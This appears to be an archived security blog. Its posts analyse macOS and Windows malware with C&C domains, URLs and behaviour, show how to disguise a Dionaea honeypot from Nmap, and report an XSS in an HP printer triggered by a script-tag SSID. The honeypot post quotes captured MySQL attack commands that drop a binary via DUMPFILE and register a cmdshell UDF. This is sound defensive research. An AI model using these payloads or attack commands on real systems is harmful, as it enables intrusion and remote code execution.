Friday, May 24, 2013

OSX Kitmos : other binary, other C&C


On May the 20th, Norman has published a report about an Indian cyberattack infrastructure that they call "Hangover" due to information found to the path to a PDB file.
Their blog post also refers to Oslo Freedom Forum attack that I wrote about in my previous article :
"Based on the sample and Command&Control domain mentioned in the F-Secure post, we can say quite conclusively that the Oslo Freedom Forum attack was performed through the same attack infrastructure. We also found another MachO executable apparently written by the same person (same Apple Developer ID), and using another domain in the Hangover infrastructure – torqspot.org."

As this domain was present in another Mach-O binary that I have, I have chose to take a quick look at it.



File informations

SHA1 hash : b6a47d52de64af50a5a1415213e60dc1b076b4e7
File type : Mach-O executable i386
VirusTotal report : https://www.virustotal.com/en/file/a74196018b2854765333a8f798b0ae3f3b71c89ec9632188f07c71d055125cb2/analysis/

C&C information

This sample uses "torqspot.org" as C&C domain name. Whois reveals still fake information :

Domain ID:D168171472-LROR
Domain Name:TORQSPOT.ORG
Created On:16-Mar-2013 05:28:07 UTC
Last Updated On:16-May-2013 03:45:16 UTC
Expiration Date:16-Mar-2014 05:28:07 UTC
Sponsoring Registrar:PDR Ltd. d/b/a PublicDomainRegistry.com (R27-LROR)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:DI_25590875
Registrant Name:Melissa Leo
Registrant Street1:E-5 cecill street
Registrant Street2:Manchester
Registrant City:Manchester
Registrant State/Province:Manchester(Cityof)
Registrant Postal Code:M14LF
Registrant Country:GB
Registrant Phone:+044.7251868
Registrant Email:leo.melissa@mail.ru

C&C is not responding anymore.

IOC

All logged messages can be used to identify a compromised macintosh. For example, the following messages can be used as IOC :

- "http://torqspot.org/App/MacADV/up.php?cname=%@&file=%@"
- "CONTACTS mreslt %@"
- "CONTACTS urlResponse  %d"
- "responseData: %@"
- "http://torqspot.org/App/MacADV/$hostname/$serverResponse"
- "/Applications"
- "End"
- "app path =%@"
- " exec path =%@"
- "file: %@"
- "connected to upload server %@"
- "Fail connected to upload server %@, begin in %d sec"
- "Try zip and upload for failed file, before."
- "ComputerName_UserName : %@"
- "Failed retry %@"
- "Retry %@"
- "New seesion"
- "search path from state.dat"
- "search path from root"
- "available paths: %@"
- "No found folder"
- "No found file"
- "Start searching"
- "%ld files found"

DNS resolution to "torqspot.org" and all kind of HTTP requests to this domain can also be used to identify a compromised computer on a network.

Features

Lots of features and functions (coml, cop, runSystemCommand, ...) are similar to previous binary analyzed. Below, only new and interesting will be detailed.

macurl

- send synchronous HTTP request to "http://torqspot.org/App/MacADV/up.php?cname=%@&file=%@" w/ hostname as 1st arg and "no" as 2nd arg
- get data at URL "http://torqspot.org/App/MacADV/$hostname/$serverResponse" w/ dataWithContentsOfURL function, where $serverResponse is the response sent by the server to the previous request
- write downloaded data to file "/Applications/$ServerResponse"
- execute following command :
"/usr/bin/ditto -x -k /Applications/$ServerResponse /Applications/" to extract PKZip archive "/Applications/$ServerResponse" to "/Applications/"
- replace/add ".app" extension to "/Applications/$ServerResponse"
- if path exists, run the executable (NSTask, setLaunchPath, launch)
- create string "http://torqspot.org/App/MacDV/up.php?cname=%@&file=%@&res=%@" w/ arguments : $hostname, $serverResponse and "sucess" (w/ one 'c' :)
- send a request using that string (w/ sendSynchronousRequest:returningResponse:error: method)
- log "file: %@" w/ data answered by the server as argument

initFileBackup

- get bundlePath and add "FileBackup.ini" to it
- use "stringWithContentsOfFile:encoding:error:" function to get content data of config file ("<bundlePath>/FileBackup.ini")
- if file content iss less than 10 characters, go to the end of the function
- extract data between <URL> and </URL> to pass as parameter to setUrl function
- extract data between <EXTENSION> and <EXTENSION> and use it to create an array of strings based on ';' separator
- call setExtArray to initialize an array with extensions stored in "FileBackup.ini" file

before_start_

- get bundlePath and add "state.dat" to it
- if that file exists, read its content and create an array of strings by spliting on "#####" separator. Then use strings in that array as paths
- if the file doesn't exist, path will be set to "/"
- call connectServer/upload of ZipUpload class and run a command similar to this : "/usr/bin/curl -F upload=@ -F pc="

find_

Looking for files based on extension

batch_

Do some stuff and call macurl

deleteState_

Delete file "<bundlePath>/state.dat" if it exists

saveState_

Save a string array to "<bundlePath>/state.dat" by separating strings by "#####". This function is called by find function and the malware terminates.


Refs

https://github.com/gdbinit/fixobjc/blob/master/fixobjc.idc
http://www.f-secure.com/weblog/archives/00002554.html
http://threatpost.com/new-mac-malware-discovered-on-attendee-computer-at-anti-surveillance-workshop/
http://blogs.norman.com/2013/security-research/the-hangover-report
https://www.botnets.fr/index.php/HangOver

Monday, May 20, 2013

OSX Kitmos analysis


On 16th of May, Sean Sullivan has published an article on F-Secure blog about a new Mac OSX malware discovered on the Mac of an African activist by Jacob Appelbaum during an Oslo Freedom Forum workshop.

File information

SHA1 hash : 4395a2da164e09721700815ea3f816cddb9d676e

According to file Unix command, this binary is a Mach-o executable containing x86 and x64 code. VirusTotal repport of this binary can be found here. With a really quick look at the sample, we can see that it is not packed, obfuscated or encrypted.

C&C information

This sample contains two C&C url which in fact are at the moment pointing to the same server at IP 50.116.28.24 (This differs from F-Secure blog post, where IP addresses of both domains where different). This IP address points to Linode hosting company.

A whois on "securitytable.org" reveals these (fake) information :

Domain ID:D168053198-LROR
Domain Name:SECURITYTABLE.ORG
Created On:04-Mar-2013 06:58:36 UTC
Last Updated On:16-May-2013 16:02:07 UTC
Expiration Date:04-Mar-2014 06:58:36 UTC
Sponsoring Registrar:PDR Ltd. d/b/a PublicDomainRegistry.com (R27-LROR)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:DI_26714386
Registrant Name:Christopher
Registrant Organization:N/A
Registrant Street1:DE-10387
Registrant Street2:Nairobi
Registrant Street3:
Registrant City:Nairobi
Registrant State/Province:Central
Registrant Postal Code:50563
Registrant Country:KE
Registrant Phone:+254.204973957
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:n.christopher@mail.ru

Whois information of "docsforum.info" domain are similar.

IOC

All logged messages can be used to identify a compromised macintosh. For example, the following messages can be used as IOC :
- " before ==%@"
- "path == %@"
- "path2===%@"
- "Hellooo"
- "Copy successful"
- "Upload response %@"
- "the path =%@"
- "path1 =%@"
- " Error - Statistics file upload failed: "%@""
- " the array value =%@"
- path to $HOME/MacApp
- date in this format : "yy-MM-dd-HH:mm:ss"
- ComputerName_UserName : $hostname-$username"
- "Start file zip : %@"
- "Start file zip : %@"
- "Start file upload : %@"
- "finished zipping file"
- "finished uploading file"
- "file path==%@"

Network traffic can be useful too to identify a compromised Mac on your network. A compromised macintosh, will generate DNS requests to "securitytable.org" and "docsforum.info" domains which, at the time I'm writing these blog post resolves to 50.116.28.24. HTTP requests to "http://securitytable.org/lang.php" and "http://docsforum.info/lang.php" will also reveal the compromission.

Features

sub_1E72

Function "sub_1E72" is responsible of the persistence of this malware. In fact, this function add the malware to the list of items to start at session login.





- get malware bundle path thanks to NSBundle.bundlePath
- call LSSharedFileListCreate with kLSSharedFileListSessionLoginItems as ListType in order to access to the list of applications starting when user logged on
- call LSSharedFileListInsertItemURL to add the path to the malware bundle to the list

PS : The malware is added to startup items of the current user only, if the malware author would like to start is program for all users on the system, he must use kLSSharedFileListGlobalLoginItems list type as LSSharedFileListCreate argument.

More information about this technique can be found here : http://cocoatutorial.grapewave.com/2010/02/creating-andor-removing-a-login-item/

cop

The first time the binary is executed, it copy itself to $HOME/<bundle_name>.app. Then, the sample calls "coml" function with the path to the new place (or its actual place, if it's not his first execution) as parameter. 

The call to "coml" will result of the execution of the following command : "/bin/sh -c open -a $HOME/<bundle_name>.app" (see coml & runSystemCommand below)

coml

Prepare "open -a $arg" NSString for "runSystemCommand" function.

runSystemCommand

Execute "/bin/sh -c $arg".


- create a NSArray via arrayWithObjects method used as command line options for "sh" and containing : "-c" and runSystemCommand argument
- create NSTask and call launchedTaskWithLaunchPath:arguments: method with "/bin/sh" and previous NSArray as argument

uploadRequestFinished

This function log some information like the response string received from the server or the path of the uploaded file. Then, the uploaded file is removed from the file system with a call to removeItemAtPath.

uploadRequestFailed

Log " Error - Statistics file upload failed: "%@"" where %@ is replaced by localizedDescription returned string.

sendRequestToServer

This function is sending hostname of the compromised macintosh to C&C server thanks to an HTTP request to http://docsforum.info/lang.php URL.

- create "http://docsforum.info/lang.php" URL for ASIFormDataRequest
- get hostname via NSProcessInfo.processInfo.hostName
- call stringByReplacingOccurrencesOfString on hostname value to replace '.' by 'p'
- log that new "hostname" string
- add hostname value to the HTTP request as a POST data named "cname" (addPostValue function)
- do the request w/ startAsynchronous

NB : I don't know if this function is called somewhere as I haven't found any xref to this function

getscreenshot

This function is used to take screenshots w/ screencapture Mac OSX binary and save them in $HOME/MacApp directory. Name of the screenshot follow this format : "yy-MM-dd-HH:mm:ss.png". This function is first called inside applicationDidFinishLaunching function. Screenshots are saved every 20 seconds.



- create $HOME/MacApp path (with NSHomeDirectory, stringWithFormat functions)
- this path will be log in Apple System Log via NSLog
- use the shared file manager to play with FS (via NSFileManager.defautlManager)
- check if the path exists (via fileExistsAtPath)
  - If it doesn't exist, create directory with createDirectoryAtPath
- get date string with this format "yy-MM-dd-HH:mm:ss" (via NSDate, NSDateFormatter, setDateFormat, stringFromDate)    // the date format is different from F-secure screenshot. here, use of ':' instead of '/' on F-Secure screenshot
- date is logged (NSLog)
- create string $HOME/MacApp/yy-MM-dd-HH:mm:ss.png
- create a NSTask object to run a program as a subprocess
  - defines the executable path to "/usr/sbin/screencapture" via setLaunchPath
  - arguments are passed to screenshot via setArguments
    /usr/sbin/screencapture -x -T 20 $HOME/MacApp/yy-MM-dd-HH:mm:ss.png : take a screenshot without any sound after a 20 seconds delay and save it to the aforementioned path
  - task is launched via launch method
- to finish, uploadImage function is called

uploadImage

This function is used to upload screenshots to "http://securitytable.org/lang.php"

- create NSUrl object with string "http://securitytable.org/lang.php" and use it to create an ASIFormDataRequest
- create MacApp directory path string and log it (like in getscreenshot function)
- get the hostname of the computer, thanks to "hostname" method of NSProcessInfo object (process information agent of the process)
- check that the path to MacApp folder exists. Go to end of the function if not
- count the number of files/screenshots w/ contentsOfDirectoryAtPath and use count function on the returned string array
- log the number of files/screenshots
- get first file of the list
- log " the array value =%@" where %@ is replaced by the name of the first file
- If ".DS_Store" exists, remove it from the file array
- Loop to take and upload screenshot
  - create NSData with content of each file/screenshot (via initWithContentsOfFile)
  - call ASIFormDataRequest.addPostValue function and set $hostname data to key "cname"
  - second call to addPostValue with key "name" and value : path to the screenshot
  - then call to setData ("setData:withFileName:andContentType:forKey:")
    key : userfile
    content type : image/png
    filename : path to the screenshot
    data : file content (screenshot)
  - upload the file/screenshot
  - call getscreenshot function

Summary

This Mac OSX malware is really simple. It has only few features :
- start at user login
- take screenshot
- upload screenshot

In addition, it is absolutely not stealth as screenshots are saved in $HOME/MacApp directory of the infected user. No advanced malware techniques/features (packing, encryption, obfuscation) have been seen in this sample.

Refs

https://github.com/gdbinit/fixobjc/blob/master/fixobjc.idc
http://www.f-secure.com/weblog/archives/00002554.html
http://threatpost.com/new-mac-malware-discovered-on-attendee-computer-at-anti-surveillance-workshop/

Monday, April 1, 2013

Analysis of an APT1 binary

In middle of February, Mandiant has released a huge report about cyber threat from Chinese government. Some of the technical details has been disclosed in Appendix C ("The Malware Arsenal") of their report.

Because of this APT buzz, I decided to take a look on one of the binary mentioned in APT1 report in order to know the level of this cyber threat.

After running a script on around 200 samples from APT1, I decided to analyse the binary which look the most strange. Report on VT can be found here.


According to PeID, this binary is not packed but it has 4 ".upx" sections and the OEP is pointing to the
last ".upx" section which is not a normal behavior. The few functions in the import table, the few strings in the binary and a high entropy in all sections confirm that point, the binary is packed! I thought interesting to take a look on this binary in order to understand and maybe discover the packer used as PeID failed to identify it.

Unpacking

Beginning of the packed code (in last .upx section : 0x8000) contains a lot of junk code. After these useless instructions, a loop is used to modify the code which follow the loop. The code after this loop is used to get addresses of LoadLibrary and GetProcAddress thanks to the ImportTableAddress field of the loaded PE file.

LoadLibrary is then used to load "kernel32.dll" and GetProcAddress to get addresses of the following functions :
GetModuleHandleA, VirtualProtect, GetModuleFileNameA, CreateFileA, GlobalAlloc, GlobalFree, ReadFile, GetFileSize, CloseHandle, CreateSemaphoreA, ReleaseSemaphore, Sleep, WaitForSingleObject, CreateThread

After the resolution of these functions, SizeOfImage in PEB->PEB_LDR_DATA->InLoadOrderModuleList is set to 1000 (previous value was 9000). Then, VirtualProtect is called in order to change access to ImageBase of the binary to PAGE_READWRITE.

Then some strings will be decoded from memory before being used for example to load library "kernel32.dll" again and then resolve addresses of VirtualProtect, VirtualAlloc,VirtualFree. As soon as the string has been used by LoadLibraryA or GetProcAddress, the string is replaced by several 0 in memory. With this kind of protection, the process contains few information in memory, so a dump of the actual process memory will be not really interesting for an analyst.

Then, code jumps to the third section (.upx 0x7000) which do similar stuff. Idem for the second .upx section.

The first .upx at RVA 0x5000 (but the last called, as order is reversed) will do similar stuff than previous sections but as this is the last packed section, these actions should be more interested for the unpacked binary.

In fact, this last .upx section will load all DLL used by the final (unpacked) binary and will resolve addresses of all functions :

kernel32.dll : CreateProcess, GetLongPathNameA, GetTempPathA, Sleep, CloseHandle, GetModuleHandleA, GetCommandLineA, GetModuleFileNameA, GetProcAddress, LoadLibraryA, ExitProcess

LZ32.dll : LZCopy, LZOpenFileA, LZClose

MSVCRT.dll : strstr, strncmp, atoi ...

ADVAPI32.dll : RegSetValueExA, RegCreateKeyExA, RegCloseKey

Then code jump in .text section, and OEP is then correct.

This packer uses several tricks to annoy the disassembler/analyst like some jumps in middle of an instruction, "push eax; retn", always true comparison ... but nothing to detect the presence of a debugger or a VM.


Malware features

After unpacking, this binary is in fact a simple downloader. The binary try to confuse IDA with lots of "JZ/JNZ" jumps. In fact, nearly all jumps are using this trick.

IDA confused

Disassembly fixed
The first function called by the unpacked code is used to resolve addresses of network functions. "wininet.dll" library is loaded at runtime with LoadLibrary and then InternetOpenUrlA, InternetOpenA, InternetCloseHandle and InternetReadFile functions addresses are resolved thanks to GetProcAddress. Address of UrlDownloadToFileA from "urlmon.dll" is also resolved with the same method.

The second function used is to assure reboot persistence to the malware. In order to run after a reboot, this malware add an entry to the registry :

[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"McUpdate"="path_to_this_binary"

Key and subkey values are not stored in clear text in the file but are encoded with a xor algorithm. The following python script decodes all encoded strings used in this binary :



Then malware contacts its C&C to get an order. URL is encoded with the aforementioned algorithm. After decoding, URL is : http://216.15.210.68/197.1.16.3_7.html. After decoding, User-Agent used to connect to the C&C is "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)". If it can't contact the C&C, it will wait 10 minutes before retry. After 3 fails to get a command from the C&C, the binary ends its execution.

Commands on the C&C server are between "<!-- DOCHTML" and "-->" HTML tags. These two tags like the following commands are also encoded in the binary. Command can be one of the following :
- Ausov : Exit the program
- Author X : Wait X * 10 minutes
- http://url : url used to download and execute an other binary.

When the last command is obtained from C&C, the file pointed by the url is downloaded to the temporary folder thanks to UrlDownloadToFile function. As the downloaded file can be compressed by Lempel-Ziv algorithm, the malware opens the downloaded file with LZOpenFile. An other file is created with nearly the same path than the first file opened : ".exe" extension is added at the end. Then, content from the first file (the downloaded one) is copied (and decompressed if necessary) to the second thanks to LZCopy function.

After that, the copied (and uncompressed) file is executed with CreateProcessA.


After analysis, the aim of this malware is simple : download and execute (more advanced?) binaries on the victim computer. This malware seems to be one of the WEBC2-AUSOV family defined by Mandiant as "Ausov" is a command of this sample.

I have not being able to identify the packer used. So if you recognized it, feedback will be welcome ;-)


Sunday, June 10, 2012

Make Dionaea stealthier for fun and no profit

I'm in my "honeypot playing period" and I've tried to scan my Dionaea with Nmap which detect of course lots of port listening but more annoying, last versions of Nmap are able to see that some services are provided by Dionaea ...



So if you want your Honeypot to be stealthier you can apply some tricks. Before to modify Dionaea services behavior, you have to know how Nmap services fingerprint feature works (I will only speak about Nmap, because that's the most used ports scanner, it's up to you to try with others).

In order to be able to discover the name and version of a service, Nmap use Perl Compatible Regular Expressions. All these regexp are stored in /usr/share/nmap/nmap-service-probes (path can change according to OS). If you want to understand nmap-service-probes file's syntax, I recommend you to read this. Below, some probes extracted from this file :



So if we want to hide our Dionaea honeypot from Nmap users, we have to modify Dionaea behavior to unmatch Nmap probes. First, list all Dionaea probes of this file :

[steeve@omega ~]$ cat /usr/share/nmap/nmap-service-probes | grep Dionaea



We can see that Nmap is able to detect "only" 4 services offered by Dionaea : FTP, HTTP, MSSQL and SMB. I will show you how we can deceive Nmap by modifying few files in Dionaea. I won't show you how to tweak MSSQL service because I haven't make deeper and this service looks a bit more complicated ... (If you have a solution, you can send me a mail or share in comments :-) 

First, if we look at the FTP probe, we can see that Nmap only checks the connection banner. So we just have to change it, and Nmap will be lost in its attempt to retrieve service name and version. For sure we can put any banner, but the best thing to do (in my opinion) is to try to act like a real FTP server. Shodan is a great tool to help us to know how to simulate FTP servers, check this link. I have choose to use MS FTP banner : "Microsoft FTP Service".

So we have to edit the Ftp python file located in : /opt/dionaea/lib/dionaea/python/dionaea/ftp.py. Now you just have to replace "Welcome to the ftp service" by the banner of your choice :



If we check HTTP Nmap probe, we can see that's a static one, no regexp used. This probe is based on HTTP headers and HTML source code. There is at least two simple solutions. We can see that HTTP service lists the directory content, so first we can decide to simply put a file in /opt/dionaea/var/dionaea/wwwroot directory, and HTML source code will be different and won't check probe anymore. The second solution is to modify the HTML code sent by Dionaea in /opt/dionaea/lib/dionaea/python/dionaea/http.py. For example, in list_directory(), we can change DTD, title page ...



SMB probe provided by Nmap is based on the value of two fields of the SMB Negotiate Protocol Response : "OemDomainName" and "ServerName". Nmap expects to receive respectively "WORKGROUP" and "HOMEUSER-XXXXXX" where X represent random data. It seems quite easy to mislead Nmap on SMB service too. We just have to modify those values in  SMB_Negociate_Protocol_Response class of file /opt/dionaea/lib/dionaea/python/dionaea/smb/include/smbfields.py. Let's try with "HINMAP" and "TRYHARDER".



You can see results of our tricks just below. Sure, that's not perfect but it's better than nothing ;-)



In this blog post, I've shown you how to use Nmap probes to "protect" your honeypot, but you can do the opposite adding new probes to get a more powerfull Nmap. In addition, it will be interesting to modify MSSQL behavior and SSL certificates to obtain a no verbose honeypot (look at the first scan for SSL certificates details).

FYI : Markus, Dionaea's creator, won't fix Dionaea regarding to Nmap (or other scanners) possible detection. It's a cat-and-mouse game that he can't win because some protocols are tricky to implement and modify whereas Nmap probes are very easy to add. You can read this mail on Nepenthes mailing list.

Monday, April 23, 2012

XSS on HP printer web interface

Yesterday I was watching a Defcon 19 talk about multi-function printer security which was pretty fun. So this give me an idea : what about mine ? For sure, I have not a professional printer which can be connected to an LDAP or whatever, but my printer (HP Deskjet 3070A) has network access too :)

According to Nmap, lots of TCP port seem opened :

Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-22 21:16 CEST
Nmap scan report for HP7D7AA8 (192.168.1.23)
Host is up (0.28s latency).
Not shown: 65520 closed ports
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
631/tcp  open  ipp
3910/tcp open  unknown
3911/tcp open  unknown
6839/tcp open  unknown
7435/tcp open  unknown
8080/tcp open  http-proxy
9100/tcp open  jetdirect
9101/tcp open  jetdirect
9102/tcp open  jetdirect
9110/tcp open  unknown
9111/tcp open  DragonIDSConsole
9112/tcp open  unknown
9220/tcp open  unknown
9290/tcp open  unknown
MAC Address: 2C:76:8A:7D:7A:A8 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 855.57 seconds

Ok cool, let's see the HTTP server and the Web interface ...

Printer's HTTP server name is too verbose, it looks like :

HP HTTP Server; HP Deskjet 3070 B611 series - 012345; Serial Number: 0123456789ABCD; Munich_mp1 Built:Thu Apr 28, 2011 03:49:36PM {0123456789ABC, ASIC id 0x00340100}

Yes we can get the serial number from the HTTP Server header :)


Now if we take a look on the web interface, we can found a fun XSS. As this printer is Wifi capable, we can configure Wifi using this interface. But what about a cool SSID like "<script> alert('owned?') </script>" ? 

I let you setup your AP with aforementioned SSID. Note than you can use an Android phone, it's easy and quick to configure :)

As soon as this Wifi AP is setup, you can configure you printer to use it : Network > Wireless Setup Wizard (https://<IP>/#hId-setupPage).


Click on "Start Wizard" :














We can see our new AP :



















Now if we select it and click on "Next", we get our XSS :D


Sunday, January 29, 2012

Caught and analyzed

In last september, I was playing with Dionaea honeypot which is a great tool (see previous article). After have caught some malwares I would to analyse one of them.


Informations about the file

According to the VirusTotal report, the file I've choose to analyzed is an IRC bot. VT shows an interesting information : the malware seems to be packed with PolyCrypt. In fact the packer version is exactly PolyCrypt PE 2.1.5. During the analysis I have found these string relating to the packer software : "PolyCrypt PE (c) 2004-2005, JLabSoftware.".

After unpacking, we can take a look to the imported DLL and functions : details here

And now we can start the real work : the reverse of the malware !


Let's start the analysis


At startup, the malware creates a script file located at c:\a.bat. The script can be downloaded here.


The script creates file 1.reg in temp directory (c:\Documents and Settings\%user%\Local Settings\Temp), then run regedit with the created reg file before to delete 1.reg and himself.
The reg file disables DCOM, RemoteConnect, restricts anonymous access, disables admin shares (for example C$), changes a lot of TCP/IP parameters and increases the number of possible simultaneous connections to a single HTTP 1.0/1.1 server (50 and 50 instead of respectively 4 and 2). It's obvious that the aim of this last registry modification is to increase DOS effects.

After that registry tweaking, the malware copy himself in c:\windows\system32\host.exe (host.exe is the original filename during spreading). It sets the create, modify and access time of explorer.exe to host.exe. Then, it runs the malware copy which will delete the first malware file.

The malware will edit registry to be executed after reboot. So it adds an entry in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\{Run,RunServices} and in HKEY_CURRENT_USER\Software\Microsoft\OLE named "Windows Update" with "host.exe" as value. Then a thread checks running processes every 30 seconds, a list of around 600 process name is parsed. A second thread disables DCOM, restricts anonymous access and disables IPC$ share every 2 minutes. And the last created thread, checks every 120 milliseconds that the malware will be executing at OS startup. After the creation of these 3 threads, Internet status is checked every 30 seconds and if the victim host has Internet access, the payload is run.


Payload

Of course, as this malware is an IRC bot, it implements some IRC commands like USER, PASS, NICK, JOIN, PONG, NOTICE, PRIVMSG, QUIT... After each action, the bot will send to the IRC C&C server NOTICE or PRIVMSG message to report the success or not of the action.

This payload has many features :
- keylogger
- Ping, TCP, UDP, HTTP flood
- DNS cache flush
- ARP table flush
- send email (spam)
- search files and directories
- move files
- get informations about the system : CPU number, CPU frequency, memory usage, disk space, disk type (network, cdrom ...), username, OS version (95, 98, ME, NT, 2000, 2003, XP or Unkown), user domain ...
- get informations about the network : IP, hostname, connection type
- get serial of 42 games (Counter-Strike, FIFA 2003... whole list here), Windows product key and the customer number
- get clipboard data
- list running AV/FW and other "security products" (ollydbg ...). The list contains around 600 processes.
- list registered services and their status (unknown, paused, pausing, continuing, starting, stoping, stoped, running, stopped)
- manage services
- restore the system in a healthy state (delete the registry key and the malware file)
- download and run binary files
- send files
- kill processes
- reverse shell (after authentication on the bot)
- update mecanism
- network sniffing
- TCP ports scan
- basic FTP server
- basic HTTP server used to download files and to send back file and directory search report
- bruteforce SQL server using a built-in list of around 1700 passwords (list here). If logon success, it will download by FTP the malware and run it thanks to "EXEC master..xp_cmdshell".
- video recording using webcam
- screenshot capabilities
- add $C, $IPC, and $ADMIN network shares
- ...


Commands

A non-exhaustive list of IRC commands can be downloaded here.


C&C

Botnet owners use IRC to exchange informations with bots, send commands ... The domain name used to contact the C&C is blah.swXXXXXXXme.com and seems to be located in England (isp : ValueVPS Limited - Hosting network).  The IRC server used by this C&C server is UnrealIRCd 3.2.7 which is listening on port 7878. Channels listed are #GuardBot-Admin, #uk, #fuckoff and #b (joined by bots). A password (imallowed2020) is required to join #b channel.
Bots name are something similare to [GSA]-123456.

Port 7878 isn't the only open port :
  • 80/tcp    open     http         Apache httpd 2.2.14 ((Fedora))
  • 99/tcp    open     ssh          OpenSSH 5.1 (protocol 2.0)
  • 6001/tcp  open     irc          Unreal ircd (used to link to other irc servers)
  • 7878/tcp  open     irc          Unreal ircd (used by irc clients)
  • 10000/tcp open     http        MiniServ 1.530 (Webmin httpd)
  • 65146/tcp open     irc          Unreal ircd (used by irc clients)

Apache is hosting the default apache webpage and on port 10000 we can find Webmin interface to administrate the server.
OS seems to be a Fedora 12 with a 2.6 kernel.

This C&C server doesn't control a huge botnet. I have done several connections to this botnet, and the number of bots was between 467 and 1393. According IRC stats, the max number of IRC users (bots) was 4088.

STATS u
:pwned28.ircd.net 242 [GSA]-370921 :Server Up 0 days, 21:46:20
:pwned28.ircd.net 250 [GSA]-370921 :Highest connection count: 1393 (4088 clients)

In addition, this server suffer from reliability problems. During my analysis, it was sometimes unavailable (january 9th, 12th...).


How to delete it ?

As this malware isn't an advanced one, it's easy to remove it from an infected computer. First you have to kill "host.exe" process using task manager or an other tool. Then you must delete the file "host.exe" located in c:\windows\system32\. With default view options, the file is invisible. You need to uncheck "Hide protected operating system files" in Windows view options. Finally, in the registry you have to delete the key "Windows Update" stored in HKEY_CURRENT_USER\Software\Microsoft\OLE and in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\{Run,RunServices}. It could be great to restore all other registry values modified by a.bat file at the beginning of the infection but you will need original values to do that ...


Comments

This malware isn't very stealth because we can found it quite easily in file system and it's even easier with task manager. According to Windows version that the malware can detect and the list of games, I can say that's an old malware with no advanced protections against RE.

Nowadays, some (a lot of ?) malware are developed by governments and cybercriminal groups. I think that's not the case of this trojan because of its "simplicity", the unreliable C&C server and some strings found in it, like "Goodbye happy r00ting.", "NzmxFtpd Owns j0" and "Nice try, idiot." doesn't look professionnal.

I have found on the Internet, a SNORT rules file which list IP address used by the C&C server. So if you have an IDS in your company, you can use this rules file which contains a list of known C&C servers, to generate alerts when an host is communicating with one of these servers.

Sunday, October 9, 2011

Some stats of my dionaea honeypot

Last month, my PC was running Dionaea honeypot during two periods of some days. So I decided to share some statistics about the attacked services, localization of the attacker, OS of the attacker ...
I have also list SQL requests used to get these informations.


P0f informations

P0f is a passive OS fingerprinting tool which will analyze network traffic to get informations like operating system version, firewall presence, NAT use, distance to the remote host and also about the kind of link used.
FYI : You need to enable p0f in dionaea configuration file and run p0f tool in order to have these datas.

select count(p0f_genre||p0f_detail) as count, (p0f_genre || " " || p0f_detail) as OS from p0fs group by (p0f_genre||p0f_detail) order by count desc; 

countOS
7509
104Windows 2000 SP4, XP SP1+
46Windows XP/2000 (RFC1323+, w+, tstamp-)
31Windows 2000 SP2+, XP SP1+ (seldom 98)
17Linux 2.6 (newer, 3)
11Linux 2.6 (newer, 2)
8Windows XP SP1+, 2000 SP3
7Linux 2.4-2.6
6Windows XP/2000 (RFC1323+, w, tstamp+)
3Windows 95
2SunOS 4.1.x
1Linux 2.6? (barebone, rare!)
1Windows 98 (no sack)


select count(p0f_link) as count, p0f_link as link from p0fs group by p0f_link order by count desc;


countlink
6051
1533ethernet/modem
101pppoe (DSL)
39IPv6/IPIP
10(Google/AOL)
5GPRS, T1, FreeS/WAN
3PIX, SMC, sometimes wireless
3sometimes DSL (2)
1vtun


Targeted local port

select count(local_port) as count, local_port as "targeted port" from connections group by local_port order by count desc;

counttargeted port
120142
33580
123135
1131433
8732554
7232045
615060
383389
388008
3723
...
18445
...

Services most targeted here are WINS, Web servers, Epmap/DCOM, SQL Server, Sip, RDP, Telnet.


Location of attackers / malware sources

select count(remote_host) as count, remote_host from connections group by remote_host order by count desc;


If we look at the map, we can see lot of connections from France. But I can explain some of them, because when my honeypot was running, I have launched some ports scan. In order to have reliable statistics, I have removed of the sqlite database connections coming from my IP but I think I've omitted some of them.


Protocol informations

select count(connection_transport) as count, connection_transport from connections group by connection_transport order by count desc;

countconnection_transport
6959tcp
85udp
13tls


select count(connection_protocol) as count, connection_protocol from connections group by connection_protocol order by count desc;

countconnection_protocol
3929pcap
1204mirrorc
1201mirrord
335httpd
123epmapper
113mssqld
70SipSession
54TftpClient
17smbd
7mysqld
4SipCall



Default passwords

select count(logins.login_username||logins.login_password) as count, logins.login_username, logins.login_password, connections.connection_protocol, connections.local_port from logins, connections where connections.connection = logins.connection group by (logins.login_username||logins.login_password) order by count desc;

countlogin_usernamelogin_passwordconnection_protocollocal_port
95samssqld1433
6rootmysqld3306


Malwares targeting my honeypot have tried to connect to MySQL with root/ and to Microsoft SQL Server with sa/ which are both default credentials.



MySQL requests

select * from mysql_command_args;

Look output of this request is quite fun :
drop function cmdshell
drop function cmdshell
drop function my_udfdoor
drop function my_udfdoor
drop function do_system
drop function do_system
use mysql;
use mysql;
drop table if exists tempMix4;
drop table if exists tempMix4;
create table if not exists tempMix4(data LONGBLOB);
create table if not exists tempMix4(data LONGBLOB);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
INSERT INTO tempMix4 VALUES (@a);
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';
drop table if exists tempMix4;
use mysql;
drop table if exists tempMix;
create table if not exists tempMix(data LONGBLOB);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
INSERT INTO tempMix VALUES (@a);
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'
INSERT INTO tempMix4 VALUES (@a);
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll'
drop table if exists tempMix4;
select data from tempMix into DUMPFILE 'D:\\amd.dll'
use mysql;
select data from tempMix into DUMPFILE '..\\bin\\amd.dll'
drop table if exists tempMix;
create table if not exists tempMix(data LONGBLOB);
create function cmdshelv returns string soname 'amd.dll';
create function cmdshelv returns string soname 'amd.dll'
